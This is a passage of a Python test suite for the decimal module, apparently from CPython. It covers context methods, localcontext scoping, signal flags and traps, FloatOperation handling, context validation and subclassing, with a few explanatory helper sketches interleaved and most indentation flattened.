Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
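# Editorial sketch (not part of the test suite): the ContextAPItests above
# all exercise one coercion rule -- Context methods accept Python ints and
# coerce them to Decimal, while str operands raise TypeError. A minimal
# illustration against the stdlib decimal module:
def _example_context_coercion():
    import decimal
    c = decimal.Context()
    # ints are coerced, so mixed calls agree with the all-Decimal call
    assert c.remainder(1, 2) == c.remainder(decimal.Decimal(1), decimal.Decimal(2))
    try:
        c.remainder('1', 2)            # strings are rejected outright
    except TypeError:
        pass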
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
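# Editorial sketch (not part of the test suite): the with-statement behaviour
# verified above in one picture -- localcontext() enters a *copy* of the
# active context and restores the original on exit. Stdlib decimal assumed:
def _example_localcontext():
    import decimal
    with decimal.localcontext() as ctx:
        ctx.prec = 5                      # changes only the copied context
        narrow = decimal.Decimal(1) / 7   # Decimal('0.14286')
    wide = decimal.Decimal(1) / 7         # outer precision again (28 by default)
    return narrow, wide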
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
        context = Context(prec=9, Emin=-425000000, Emax=425000000,
                          rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
                new_flags = [k for k, v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
        FloatOperation = self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
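# Editorial sketch (not part of the test suite): the FloatOperation contract
# tested above -- implicit float conversion merely sets the flag until the
# trap is enabled, whereas Decimal.from_float() never signals. Stdlib decimal:
def _example_float_operation():
    import decimal
    with decimal.localcontext() as c:
        c.clear_flags()
        decimal.Decimal(7.5)                      # implicit: sets the flag
        assert c.flags[decimal.FloatOperation]
        c.clear_flags()
        decimal.Decimal.from_float(7.5)           # explicit: stays silent
        assert not c.flags[decimal.FloatOperation]
        c.traps[decimal.FloatOperation] = True
        try:
            decimal.Decimal(7.5)                  # implicit: now raises
        except decimal.FloatOperation:
            pass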
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
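# Editorial sketch (not part of the test suite): the template rule asserted
# above -- setcontext(BasicContext) installs a copy, so the template object
# itself never becomes the active context. Stdlib decimal assumed:
def _example_context_template_copy():
    import decimal
    saved = decimal.getcontext()
    try:
        decimal.setcontext(decimal.BasicContext)
        active = decimal.getcontext()
        assert active is not decimal.BasicContext   # a copy was installed
        assert active.prec == decimal.BasicContext.prec
    finally:
        decimal.setcontext(saved)                   # leave global state intact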
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
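# Editorial sketch (not part of the test suite): the three validation error
# classes exercised by ContextInputValidation above, in miniature -- range
# problems raise ValueError, type problems TypeError, and signal dicts with
# missing keys KeyError. Stdlib decimal assumed:
def _example_context_validation():
    import decimal
    c = decimal.Context()
    for exc, attr, value in [
        (ValueError, 'prec', -1),     # out of range
        (TypeError, 'prec', 'xyz'),   # wrong type
        (KeyError, 'flags', {}),      # signal dict lacking required keys
    ]:
        try:
            setattr(c, attr, value)
        except exc:
            pass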
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
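# Editorial sketch (not part of the test suite): the subclassing pattern from
# ContextSubclassing above, reduced -- assignments in a subclass __init__ go
# through the base class setters, so all validation is inherited. Stdlib
# decimal assumed:
def _example_context_subclass():
    import decimal
    class PrecOnlyContext(decimal.Context):
        def __init__(self, prec=None):
            decimal.Context.__init__(self)
            if prec is not None:
                self.prec = prec            # validated by the base setter
    assert PrecOnlyContext(prec=5).prec == 5
    try:
        PrecOnlyContext(prec=-1)            # rejected exactly like Context
    except ValueError:
        pass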
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(C.__libmpdec_version__, P.__libmpdec_version__)
x = dir(C)
y = [s for s in dir(P) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
        y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
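# Editorial sketch (not part of the test suite): the dir()-based parity check
# that CheckAttributes uses above, as a standalone helper -- an empty result
# means every public name of `a` also exists on `b`:
def _example_public_names_missing_from(a, b):
    x = {s for s in dir(a) if '__' in s or not s.startswith('_')}
    y = {s for s in dir(b) if '__' in s or not s.startswith('_')}
    return x - y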
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
